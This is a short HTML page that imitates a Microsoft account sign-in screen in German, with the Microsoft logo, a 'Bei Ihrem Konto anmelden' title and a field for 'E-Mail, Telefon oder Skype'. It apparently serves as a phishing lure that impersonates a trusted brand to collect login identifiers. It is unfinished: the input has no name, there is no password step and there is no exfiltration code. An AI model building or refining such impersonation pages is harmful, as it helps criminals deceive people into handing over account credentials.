<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Bei Ihrem Konto anmelden</title>
    <link rel="stylesheet" href="styles.css">
    <style>

.center_box {
    z-index: 1;
}

.logo {
position: fixed;
bottom: 560px;
right: 530px;
z-index: 1;
}
.textbox {
  position: fixed;
  bottom: 450px;
  right: 290px;
  z-index: 2;
  font-family: Arial;
  font-size: 23px;
  font-weight: bold

}
.textbox p {
    margin-right: 10px;
}

.textbox input {
    width: 320px;
    border: none;
    padding: 5px;
    font-size: 15px;
    margin-top: 0px;
}
.textbox hr {
 border: none;
  height: 1px;
  background-color: black;
  margin-top: 0px;
}
</style>
</head>
<body>
<form class=textbox action="/url" method="GET">
        <p> Anmelden </p>
        <input type="text" style="width:340px" placeholder="E-Mail, Telefon oder Skype" >
    <hr>
    </form>
<img class="center_box" src="center_box.jpg" alt="Centered Image">
<img class="logo" src="microsoft_logo.png" alt="Microsoft Logo">

<h1>
</h1>

</body>
</html>
